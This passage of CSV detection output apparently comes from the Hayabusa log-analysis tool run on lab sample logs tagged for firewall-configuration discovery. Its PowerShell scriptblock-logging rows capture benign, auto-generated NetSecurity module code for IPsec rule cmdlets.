[Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAsso",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_que",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' function 
Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 